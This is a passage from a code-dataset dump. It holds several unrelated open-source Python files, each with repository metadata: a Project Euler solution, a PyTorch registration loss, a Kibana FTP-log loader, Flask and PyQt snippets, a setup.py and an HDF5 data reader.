    qn[1:2*nx:2, 1:2*ny:2] = (3*c7)/16.0+(9*c6)/16.0+(9*c5)/16.0+(3*c4)/16.0-(3*c3)/16.0-(3*c1)/16.0-c0/8.0
    # node 3 (upper-left)
    qn[0:2*nx:2, 1:2*ny:2] = (9*c7)/16.0+(9*c6)/16.0+(3*c5)/16.0+(3*c4)/16.0-(3*c2)/16.0-c1/8.0-(3*c0)/16.0
    return Xn, Yn, qn
# Compare the total-energy history of three double-shear runs that differ
# only in their CFL number, and report the net energy drift of each run.
# (Python 2 script: note the print statements below.)
fig = pylab.figure(2)
# Columns of the *_totalEnergy files: [:,0] = time, [:,1] = total energy.
tr_125 = pylab.loadtxt('../s125/s125-double-shear_totalEnergy')
tr_129 = pylab.loadtxt('../s129/s129-double-shear_totalEnergy')
tr_130 = pylab.loadtxt('../s130/s130-double-shear_totalEnergy')
# NOTE(review): refTe (initial energy of the CFL-0.2 run) is computed but
# never used below.
refTe = tr_125[0,1]
pylab.plot(tr_125[:,0], tr_125[:,1], label='CFL 0.2')
pylab.plot(tr_129[:,0], tr_129[:,1], label='CFL 0.1')
pylab.plot(tr_130[:,0], tr_130[:,1], label='CFL 0.05')
pylab.legend(loc='lower left')
pylab.title('Total Energy History')
pylab.xlabel('Time [s]')
pylab.ylabel('Total Energy')
pylab.savefig('s125s129s130-double-shear-totalEnergy_cmp.png')
pylab.close()
# Energy change over the whole run (final minus initial) per CFL number.
print "CFL 0.2", tr_125[-1,1]-tr_125[0,1]
print "CFL 0.1", tr_129[-1,1]-tr_129[0,1]
print "CFL 0.05", tr_130[-1,1]-tr_130[0,1]
| 2,878 | 0 | 69 |
bf053ecb91b45e0f5471a68564e3344dd8799600 | 414 | py | Python | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | """
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
"""
biggest_number = 0
for i in range(999):
for n in range(999):
number = i*n
if str(number) == str(number)[::-1]:
if number > biggest_number:
biggest_number = number
print(biggest_number) | 29.571429 | 133 | 0.717391 | """
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
"""
biggest_number = 0
# Three-digit factors are 100..999 inclusive; the original range(999)
# missed 999 itself and needlessly scanned 1- and 2-digit factors too.
for i in range(100, 1000):
    # Start the inner loop at i: products are commutative, so each
    # unordered factor pair only needs to be checked once.
    for n in range(i, 1000):
        number = i * n
        # A palindrome reads the same forwards and backwards.
        if str(number) == str(number)[::-1]:
            if number > biggest_number:
                biggest_number = number
print(biggest_number)
26992116356270d5c84cb8edcdb4c4bedbb9668c | 3,065 | py | Python | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 13 | 2020-01-13T15:25:44.000Z | 2022-02-21T10:56:51.000Z | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 1 | 2021-12-15T17:40:44.000Z | 2021-12-15T17:40:44.000Z | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 2 | 2021-08-03T16:31:46.000Z | 2022-03-16T22:00:37.000Z | # Copyright 2019 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
__author__ = "Robin Sandkuehler"
__copyright__ = "Copyright (C) 2019 Center for medical Image Analysis and Navigation"
import torch as th
# Loss base class (standard from PyTorch)
# conditional return
class MSE(_PairwiseImageLoss):
r""" The mean square error loss is a simple and fast to compute point-wise measure
which is well suited for monomodal image registration.
.. math::
\mathcal{S}_{\text{MSE}} := \frac{1}{\vert \mathcal{X} \vert}\sum_{x\in\mathcal{X}}
\Big(I_M\big(x+f(x)\big) - I_F\big(x\big)\Big)^2
Args:
fixed_image (Image): Fixed image for the registration
moving_image (Image): Moving image for the registration
size_average (bool): Average loss function
reduce (bool): Reduce loss function to a single value
"""
| 37.378049 | 114 | 0.669821 | # Copyright 2019 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
__author__ = "Robin Sandkuehler"
__copyright__ = "Copyright (C) 2019 Center for medical Image Analysis and Navigation"
import torch as th
# Loss base class (standard from PyTorch)
class _PairwiseImageLoss(th.nn.modules.Module):
def __init__(self, fixed_image, moving_image, size_average=True, reduce=True):
super(_PairwiseImageLoss, self).__init__()
self._size_average = size_average
self._reduce = reduce
self.name = "parent"
self._weight = 1
def set_loss_weight(self, weight):
self._weight = weight
# conditional return
def return_loss(self, tensor):
if self._size_average and self._reduce:
return tensor.mean() * self._weight
if not self._size_average and self._reduce:
return tensor.sum() * self._weight
if not self.reduce:
return tensor * self._weight
class MSE(_PairwiseImageLoss):
    r""" The mean square error loss is a simple and fast to compute point-wise measure
    which is well suited for monomodal image registration.
    .. math::
        \mathcal{S}_{\text{MSE}} := \frac{1}{\vert \mathcal{X} \vert}\sum_{x\in\mathcal{X}}
        \Big(I_M\big(x+f(x)\big) - I_F\big(x\big)\Big)^2
    Args:
        size_average (bool): Average loss function
        reduce (bool): Reduce loss function to a single value
    """
    def __init__(self, size_average=True, reduce=True):
        # BUG FIX: the parent signature is
        # (fixed_image, moving_image, size_average, reduce); the previous
        # call `super().__init__(size_average, reduce)` bound both flags to
        # the image slots, so they were silently ignored and the parent
        # defaults were always used.
        super(MSE, self).__init__(None, None, size_average, reduce)
        self.name = "mse"

    def forward(self, displacement, fixed_image, warped_image):
        """Compute the masked MSE between the warped and fixed images.

        Pixels whose displacement falls outside the [-1, 1] sampling grid
        along any dimension are excluded from the reduced loss.

        Returns:
            Tuple of (reduced loss, per-pixel squared-error image).
        """
        # Accumulate out-of-bounds flags per displacement dimension.
        mask = th.zeros_like(fixed_image, dtype=th.uint8, device=fixed_image.device)
        if displacement.shape[0] > 1:
            for dim in range(displacement.size()[-1]):
                mask += (displacement[..., dim].gt(1)).unsqueeze(1) + (displacement[..., dim].lt(-1)).unsqueeze(1)
        else:
            for dim in range(displacement.size()[-1]):
                mask += (displacement[..., dim].gt(1)) + (displacement[..., dim].lt(-1))
        # Valid pixels are those never flagged out of bounds.
        mask = mask == 0
        value_image = (warped_image - fixed_image).pow(2)
        value = th.masked_select(value_image, mask)
        return self.return_loss(value), value_image
| 1,391 | 26 | 154 |
c4d993b225afa6543ad3c035e2ea0487b8abb0d0 | 6,755 | py | Python | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import os
from argparse import ArgumentParser
import psycopg2.extras
import requests
from requests.auth import HTTPBasicAuth
from ebi_eva_common_pyutils.logger import logging_config
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
from retry import retry
logger = logging_config.get_logger(__name__)
logging_config.add_stdout_handler()
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
if __name__ == '__main__':
main()
| 43.580645 | 120 | 0.682457 | #!/usr/bin/python
import os
from argparse import ArgumentParser
import psycopg2.extras
import requests
from requests.auth import HTTPBasicAuth
from ebi_eva_common_pyutils.logger import logging_config
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
from retry import retry
logger = logging_config.get_logger(__name__)
logging_config.add_stdout_handler()
def create_stats_table(private_config_xml_file, ftp_table_name):
    """Create the FTP-traffic statistics table in the metadata DB if absent.

    Columns mirror one row per Elasticsearch FTP-log document; the composite
    primary key (_index, _id) makes re-loads idempotent at the row level.
    """
    with get_metadata_connection_handle('production_processing', private_config_xml_file) as metadata_connection_handle:
        query_create_table = (
            f'CREATE TABLE IF NOT EXISTS {ftp_table_name} '
            '(_index TEXT, _id TEXT, event_ts_txt TEXT, event_ts TIMESTAMP, host TEXT, uhost TEXT,'
            ' request_time TEXT, request_year INTEGER, request_ts TIMESTAMP,'
            ' file_name TEXT, file_size BIGINT, transfer_time INTEGER,'
            ' transfer_type CHAR, direction CHAR, special_action CHAR(4), access_mode CHAR,'
            ' country CHAR(2), region TEXT, city TEXT, domain_name TEXT, isp TEXT, usage_type TEXT,'
            ' primary key(_index, _id))'
        )
        execute_query(metadata_connection_handle, query_create_table)
def load_batch_to_table(batch, private_config_xml_file, ftp_table_name):
    """Flatten one batch of Elasticsearch hits and insert it into *ftp_table_name*.

    Each hit contributes a 22-value row matching the schema built by
    create_stats_table; the two timestamp casts are performed by Postgres
    inside the INSERT statement.
    """
    batch = [(h['_index'], h['_id'], h['_source']) for h in batch]
    rows = [(
        idx,
        i, # document ids are unique per index
        b['@timestamp'], # event timestamp
        b['@timestamp'], # to be converted
        b['host'], # webprod host
        b['uhost'], # unique user host string
        # FTP log fields: see https://docs.oracle.com/cd/E19683-01/817-0667/6mgevq0ee/index.html
        b['current_time'],
        b['year'],
        f"{b['year']} {b['current_time']}", # to be converted
        b['file_name'],
        b['file_size'],
        b['transfer_time'],
        b['transfer_type'],
        b['direction'],
        b['special_action_flag'],
        b['access_mode'],
        # IP2Location fields: see https://www.ip2location.com/web-service/ip2location
        b['ip2location']['country_short'],
        b['ip2location']['region'],
        b['ip2location']['city'],
        b['ip2location']['domain'],
        b['ip2location']['isp'],
        b['ip2location']['usage_type'],
    ) for idx, i, b in batch]
    with get_metadata_connection_handle('production_processing', private_config_xml_file) as metadata_connection_handle:
        with metadata_connection_handle.cursor() as cursor:
            # Parameterised INSERT; execute_batch groups rows into few
            # round-trips instead of one statement per row.
            query_insert = (
                f'INSERT INTO {ftp_table_name} '
                'VALUES (%s, %s, %s, cast(%s as timestamp with time zone), %s, %s, %s, %s, '
                'cast(%s as timestamp without time zone), %s, %s, %s, %s, %s, %s, '
                '%s, %s, %s, %s, %s, %s, %s)'
            )
            psycopg2.extras.execute_batch(cursor, query_insert, rows)
def get_most_recent_timestamp(private_config_xml_file, ftp_table_name):
    """Return the newest event_ts_txt already loaded into *ftp_table_name*.

    Returns None when the table is empty (or holds only NULL timestamps),
    which signals the caller to fetch everything from scratch.
    """
    sql = f"select max(event_ts_txt) as recent_ts from {ftp_table_name};"
    with get_metadata_connection_handle('production_processing', private_config_xml_file) as connection:
        rows = get_all_results_for_query(connection, sql)
    if not rows or not rows[0][0]:
        return None
    return rows[0][0]
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
def query(kibana_host, basic_auth, private_config_xml_file, batch_size, ftp_table_name):
    """Open a 24h Elasticsearch scroll over EVA FTP-log documents.

    Only documents newer than the most recent timestamp already in
    *ftp_table_name* are requested, making reruns incremental.
    Returns (scroll_id, total_hits, first_batch), or (None, None, None)
    when there is nothing new.
    """
    # NOTE(review): os.path.join is used to build a URL — fine on POSIX,
    # would produce backslashes on Windows; confirm deployment platform.
    first_query_url = os.path.join(kibana_host, 'ftplogs*/_search?scroll=24h')
    query_conditions = [{'query_string': {'query': 'file_name:("/pub/databases/eva/")'}}]
    most_recent_timestamp = get_most_recent_timestamp(private_config_xml_file, ftp_table_name)
    if most_recent_timestamp:
        # Incremental load: only fetch documents after the last loaded one.
        query_conditions.append({'range': {'@timestamp': {'gt': most_recent_timestamp}}})
    post_query = {
        'size': str(batch_size),
        'query': {'bool': {'must': query_conditions}}
    }
    response = requests.post(first_query_url, auth=basic_auth, json=post_query)
    response.raise_for_status()
    data = response.json()
    total = data['hits']['total']
    if total == 0:
        logger.info('No results found')
        return None, None, None
    scroll_id = data['_scroll_id']
    return scroll_id, total, data['hits']['hits']
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
def scroll(kibana_host, basic_auth, scroll_id):
    """Fetch the next page of hits for an already-open Elasticsearch scroll."""
    endpoint = os.path.join(kibana_host, '_search/scroll')
    payload = {'scroll': '24h', 'scroll_id': scroll_id}
    reply = requests.post(endpoint, auth=basic_auth, json=payload)
    reply.raise_for_status()
    return reply.json()['hits']['hits']
def main():
    """Parse CLI arguments and stream Kibana FTP-log hits into Postgres.

    Flow: optionally create the target table, open a scroll query, then
    page through results with scroll(), loading each batch as it arrives.
    """
    parser = ArgumentParser(description='Retrieves data from Kibana and dumps into a local postgres instance')
    parser.add_argument('--kibana-host', help='Kibana host to query, e.g. http://example.ebi.ac.uk:9200', required=True)
    parser.add_argument('--kibana-user', help='Kibana API username', required=True)
    parser.add_argument('--kibana-pass', help='Kibana API password', required=True)
    parser.add_argument('--batch-size', help='Number of records to load at a time', type=int, default=10000)
    parser.add_argument('--ftp-table-name', help='Name of stats table to use', default='eva_web_srvc_stats.ftp_traffic')
    parser.add_argument('--private-config-xml-file', help='ex: /path/to/eva-maven-settings.xml', required=True)
    parser.add_argument('--create-table', help='Whether to create the FTP traffic table',
                        action='store_true', default=False)
    args = parser.parse_args()
    kibana_host = args.kibana_host
    basic_auth = HTTPBasicAuth(args.kibana_user, args.kibana_pass)
    private_config_xml_file = args.private_config_xml_file
    batch_size = args.batch_size
    ftp_table_name = args.ftp_table_name
    if args.create_table:
        create_stats_table(private_config_xml_file, ftp_table_name)
    loaded_so_far = 0
    # First page comes back from query() together with the scroll cursor.
    scroll_id, total, batch = query(kibana_host, basic_auth, private_config_xml_file, batch_size, ftp_table_name)
    if not batch:
        return
    logger.info(f'{total} results found.')
    load_batch_to_table(batch, private_config_xml_file, ftp_table_name)
    loaded_so_far += len(batch)
    # Remaining pages are pulled through the scroll cursor until the
    # reported total is reached.
    while loaded_so_far < total:
        logger.info(f'Loaded {loaded_so_far} records...')
        batch = scroll(kibana_host, basic_auth, scroll_id)
        load_batch_to_table(batch, private_config_xml_file, ftp_table_name)
        loaded_so_far += len(batch)
    logger.info(f'Done. Loaded {loaded_so_far} total records.')
# Script entry point: run the Kibana -> Postgres FTP-usage load.
if __name__ == '__main__':
    main()
| 5,991 | 0 | 136 |
7749d6332e7e48b335408d32acd46d623497b9b0 | 1,178 | py | Python | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import json
if __name__ == '__main__':
import sys
basedir = sys.argv[1]
files, replicas = load_files_replicas(basedir)
files_path = os.path.join(basedir, 'files.json')
with open(files_path, 'w') as ff:
ff.write(json.dumps(files, indent=4, sort_keys=True))
replicas_path = os.path.join(basedir, 'replicas.json')
with open(replicas_path, 'w') as fr:
fr.write(json.dumps(replicas, indent=4, sort_keys=True))
| 31.837838 | 68 | 0.580645 | #!/usr/bin/env python
import os
import json
def load_files_replicas(basedir):
    """Merge the per-subdirectory trace files found under *basedir*.

    Every subdirectory is expected to hold a files.json (a JSON list) and
    any number of replicas*.json files.  Returns a (files, replicas) pair
    of concatenated lists.
    """
    merged_files = []
    merged_replicas = []
    for entry in os.listdir(basedir):
        subdir = os.path.join(basedir, entry)
        if not os.path.isdir(subdir):
            continue
        with open(os.path.join(subdir, 'files.json')) as handle:
            merged_files.extend(json.load(handle))
        for name in os.listdir(subdir):
            if name.startswith('replicas') and name.endswith('.json'):
                with open(os.path.join(subdir, name)) as handle:
                    merged_replicas.extend(json.load(handle))
    return merged_files, merged_replicas
# Script entry point: merge all per-directory trace files under the
# directory given as the first CLI argument, then write the combined
# files.json and replicas.json back into that directory.
if __name__ == '__main__':
    import sys
    basedir = sys.argv[1]
    files, replicas = load_files_replicas(basedir)
    files_path = os.path.join(basedir, 'files.json')
    with open(files_path, 'w') as ff:
        ff.write(json.dumps(files, indent=4, sort_keys=True))
    replicas_path = os.path.join(basedir, 'replicas.json')
    with open(replicas_path, 'w') as fr:
        fr.write(json.dumps(replicas, indent=4, sort_keys=True))
| 670 | 0 | 23 |
0e3cbace0e9b47475844b5b00c2e3553be5c9459 | 829 | py | Python | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | from flask import render_template, url_for, redirect, flash
from flask_login import current_user
from .. import db
from ..models import User, Tweet
from . import user
from .forms import TweetForm
from ..queries import get_all_tweets, send_tweet, get_user
@user.route('/<username>', methods=['GET', 'POST'])
| 37.681818 | 109 | 0.706876 | from flask import render_template, url_for, redirect, flash
from flask_login import current_user
from .. import db
from ..models import User, Tweet
from . import user
from .forms import TweetForm
from ..queries import get_all_tweets, send_tweet, get_user
@user.route('/<username>', methods=['GET', 'POST'])
def user(username):
    """Render a user's profile page.

    On the logged-in user's own page, also validates the tweet form and
    posts a new tweet on submission (POST-redirect-GET).  Responds 404
    when *username* does not exist.
    # NOTE(review): the view name shadows the imported `user` blueprint
    # after definition; the route is already registered by then, but the
    # module-level name changes — confirm nothing else uses it afterwards.
    """
    # Bug fix: abort() was called below but never imported — the visible
    # module import only brings in render_template/url_for/redirect/flash,
    # so a missing user raised NameError instead of a 404.
    from flask import abort
    tweetform = TweetForm()
    u = get_user(username)
    if u is None:
        return abort(404)
    elif u == current_user:
        if tweetform.validate_on_submit():
            send_tweet(tweetform.message.data, u)
            return redirect(url_for('user.user', username=u.username))
        return render_template('user/myprofile.html.j2', user=u, tweets=get_all_tweets(u), tweetform=tweetform)
    else:
        return render_template('user/profile.html.j2', user=u, tweets=get_all_tweets(u))
| 499 | 0 | 22 |
a3bc022859e29b21627241b8ca4418a6d0d25fde | 611 | py | Python | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from pathlib import Path
from setuptools import find_packages, setup
packages = find_packages(where="asdf_chunked")
packages.append("asdf_chunked.resources")
package_dir = {
"": "asdf_chunked",
"asdf_chunked.resources": "resources",
}
package_data = {"asdf_chunked.resources": package_yaml_files("resources")}
setup(
use_scm_version=True,
packages=packages,
package_dir=package_dir,
package_data=package_data,
)
| 21.821429 | 74 | 0.736498 | #!/usr/bin/env python
from pathlib import Path
from setuptools import find_packages, setup
# Discover the package tree under the src-style layout, then register the
# data-only resources package by hand (it has no __init__.py for
# find_packages to detect).
packages = find_packages(where="asdf_chunked")
packages.append("asdf_chunked.resources")
# Map package names to their on-disk directories for the src-style layout.
package_dir = {
    "": "asdf_chunked",
    "asdf_chunked.resources": "resources",
}
def package_yaml_files(directory):
    """Return sorted paths of all *.yaml files under *directory*, relative to it."""
    root = Path(directory)
    return [str(yaml_file.relative_to(root)) for yaml_file in sorted(root.rglob("*.yaml"))]
# Ship the YAML schema/manifest files as package data; the version is
# derived from SCM tags via setuptools_scm (use_scm_version).
package_data = {"asdf_chunked.resources": package_yaml_files("resources")}
setup(
    use_scm_version=True,
    packages=packages,
    package_dir=package_dir,
    package_data=package_data,
)
| 123 | 0 | 23 |
ecfe7d6e82aad57a073e0bcca5d4e54e0ca8540e | 2,645 | py | Python | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QAction, QTableWidget,QTableWidgetItem,QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
# @pyqtSlot()
# def add_element(self):
# des = "HI"
# price = 10
# self.tableWidget.insertRow(self.items)
# description_item = QTableWidgetItem(des)
# price_item = QTableWidgetItem("{:.2f}".format(float(price)))
# price_item.setTextAlignment(Qt.AlignRight)
# self.tableWidget.setItem(self.items, 0, description_item)
# self.tableWidget.setItem(self.items, 1, price_item)
# self.description.setText("")
# self.price.setText("")
# self.items += 1
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
| 34.802632 | 114 | 0.635161 | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QAction, QTableWidget,QTableWidgetItem,QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QWidget):
    """Minimal PyQt5 window showing a fixed 4x3 QTableWidget demo."""
    def __init__(self):
        super().__init__()
        # Window chrome stored as attributes and applied in initUI.
        # NOTE(review): self.width/self.height shadow QWidget's width()/height()
        # methods on the instance — confirm nothing relies on calling them.
        self.title = 'PyQt5 table - pythonspot.com'
        self.left = 0
        self.top = 0
        self.width = 300
        self.height = 200
        self.initUI()
    def initUI(self):
        """Apply title/geometry, build the table, lay it out, and show."""
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.createTable()
        # Add box layout, add table to box layout and add box layout to widget
        self.layout = QVBoxLayout()
        self.layout.addWidget(self.tableWidget)
        self.setLayout(self.layout)
        # Show widget
        self.show()
    def createTable(self):
        """Create the 4x3 table and populate the first row with sample text."""
        # Create table
        self.tableWidget = QTableWidget()
        self.tableWidget.setRowCount(4)
        self.tableWidget.setColumnCount(3)
        self.tableWidget.setHorizontalHeaderLabels(["x-component", "y-component","z-component"])
        # NOTE(review): only 2 vertical labels for 4 rows, and the text looks
        # left over from another example — confirm intended labels.
        self.tableWidget.setVerticalHeaderLabels(["Description", "Price"])
        self.tableWidget.setItem(0,0, QTableWidgetItem("as"))
        self.tableWidget.setItem(0,1, QTableWidgetItem("Ceddll (1,2)"))
        self.tableWidget.setItem(0,2, QTableWidgetItem("Ceddll (1,2)"))
        # self.tableWidget.setItem(1,0, QTableWidgetItem("Cesll (2,1)"))
        # self.tableWidget.setItem(1,1, QTableWidgetItem("Ced2,2)"))
        # self.tableWidget.setItem(2,0, QTableWidgetItem("Ck,1)"))
        # self.tableWidget.setItem(2,1, QTableWidgetItem("Cen (3,2)"))
        # self.tableWidget.setItem(3,0, QTableWidgetItem(" (4,1)"))
        # self.tableWidget.setItem(3,1, QTableWidgetItem("Celdslkjk (4,2)"))
        self.tableWidget.move(0,0)
        # table selection change
        # self.tableWidget.doubleClicked.connect(self.on_click)
        # self.fill_table()
# @pyqtSlot()
# def add_element(self):
# des = "HI"
# price = 10
# self.tableWidget.insertRow(self.items)
# description_item = QTableWidgetItem(des)
# price_item = QTableWidgetItem("{:.2f}".format(float(price)))
# price_item.setTextAlignment(Qt.AlignRight)
# self.tableWidget.setItem(self.items, 0, description_item)
# self.tableWidget.setItem(self.items, 1, price_item)
# self.description.setText("")
# self.price.setText("")
# self.items += 1
# Script entry point: start the Qt event loop with the demo window.
if __name__ == '__main__':
    app = QApplication(sys.argv)
    ex = App()
    sys.exit(app.exec_())
| 1,694 | -2 | 112 |
1d2cae0db33f52060f5c4d93831d43614df1c77a | 3,972 | py | Python | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 49 | 2017-04-19T08:29:12.000Z | 2020-10-15T07:27:54.000Z | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 6 | 2017-10-04T08:45:44.000Z | 2018-07-26T05:06:31.000Z | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 28 | 2017-04-22T06:32:10.000Z | 2020-03-19T12:25:22.000Z | # Copyright (c) 2017, Oren Kraus All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import h5py
import numpy as np
| 41.810526 | 130 | 0.656848 | # Copyright (c) 2017, Oren Kraus All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import h5py
import numpy as np
class Data:
    """Batched reader over an HDF5 file whose datasets are stored in
    numbered chunks per key (e.g. 'data1', 'data2', ..., 'label1', ...).

    getBatch() returns a dict of pre-allocated float32 arrays of shape
    (batchSize, width-of-key), refilled in place on every call.
    # NOTE(review): this code uses '/' for dataset-index arithmetic, which
    # is float division on Python 3 and would build keys like 'data1.0' —
    # presumably written for Python 2 ('//' intended); confirm before use.
    """
    def __init__(self,
                 folder,
                 keys2fetch,
                 batchSize,
                 ):
        self.numData = 0
        self.batchSize = batchSize
        self.folder = folder
        # Open read-only; the handle stays open for the object's lifetime.
        self.h5data = h5py.File(self.folder, 'r')
        self.keys2fetch = keys2fetch
